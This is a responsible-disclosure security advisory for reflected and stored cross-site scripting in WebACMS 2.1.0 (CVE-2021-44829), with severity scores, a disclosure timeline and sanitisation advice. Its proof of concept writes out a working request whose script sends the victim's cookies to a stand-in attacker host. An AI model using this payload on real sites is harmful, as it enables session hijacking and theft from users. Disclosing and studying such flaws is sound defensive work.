what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WebACMS 2.1.0 Cross Site Scripting

WebACMS 2.1.0 Cross Site Scripting
Posted Jan 25, 2022
Authored by Patrick Hener, Siva Rajendran

WebACMS version 2.1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2021-44829
SHA-256 | 6e22d1940828e4c457520ea425676dbc1e4ff812d2bc11a71638f4a102722c6f

WebACMS 2.1.0 Cross Site Scripting

Change Mirror Download
Advisory ID: TO-2021-001
Product: WebACMS
Vendor: AFI Solutions GmbH
Tested Version: 2.1.0
Fixed Version: -
Vulnerability Type: Cross-Site Scripting (CWE-79)
CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:P/A:N (Score 6.4)
CVSSv3 Severity: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (Score 6.1)
Solution Status: Unfixed
Manufacturer Notification: 2021-12-13
Solution Date: 2022-01-17
Public Disclosure: 2022-01-20
CVE Reference: CVE-2021-44829
Authors of Advisory: Patrick Hener & Siva Rajendran, Thinking Objects GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The product "ACMS" of AFI Solutions GmbH [1] is a so called edi
converter. For
companies to be able to exchange arbitrary data it is common to use a edi
converter to convert between data formats of the sender and the recipient.
The product of AFI Solutions also incorporates a web interface, which is the
subject of this advisory.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The index page has a parameter "ID" which is used to navigate within the web
application. It is not properly sanitized and will be rendered into the
login
form of the index page, as well. The vulnerable code will be shown from the
following listing:

<FORM name=thisForm METHOD=post action="/index.html?id=1" target="_top">
<table class="logintable">
<tr>
<td width="110">Benutzername</td>
[.. truncated ..]
</form>

The parameter can be chosen from the actual url in the browser and thus is
unsanitized user controlled input. This makes the application vulnerable to
reflected Cross-Site Scripting. This vulnerability also applies to basically
all user controlled input after login. Also content returned by the database
is not properly sanitized before presentation, as well. Therefore the app is
also vulnerable to stored Cross-Site Scripting.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following request will steal the applications insecure cookies using
this
vulnerablity.

GET
/index.html?id=%22%3E%3Cscript%3Edocument.location=%27http://evil.host.com
/cookies?%27%2Bdocument.cookie;%3C/script%3E%3Cid=%22 HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101
Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,
image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: COMID=
Upgrade-Insecure-Requests: 1

This will render to the following html code and trigger in a victims
browser.

<FORM name=thisForm METHOD=post action="/index.html?id="><script>
document.location='http://evil.host.com/cookies?'+document.cookie;</script>
<id="" target="_top">

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The user supplied data should be sanitized before using it to render a page.
Also database retrieved content should be sanitized before presenting it
to the
browser again.

The vendor states that this software component was only used by the vendors
support and that it is not used actively anymore. The vendor recommends to
deactivate this component.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:
2021-12-10: Vulnerability discovered
2021-12-13: Vulnerability reported to manufacturer
2022-01-17: Solution provided by manufacturer
2022-01-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Vendor Website
https://www.afi-solutions.com/
[2] Thinking Objects Security Advisory
https://blog.to.com/advisory-webacms-2-1-0-cross-site-scripting
[3] Thinking Objects Responsible Disclosure Policy
https://blog.to.com/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Patrick Hener and Siva Rajendran
of Thinking Objects GmbH.

E-Mail: patrick.hener@to.com
Public Keys: https://to.com/pgp-keys
Key ID: 877756EA2CB50685
Key Fingerprint: 2605 3D51 3FAA 3795 E116 95EC 8777 56EA 2CB5 0685

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en




Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close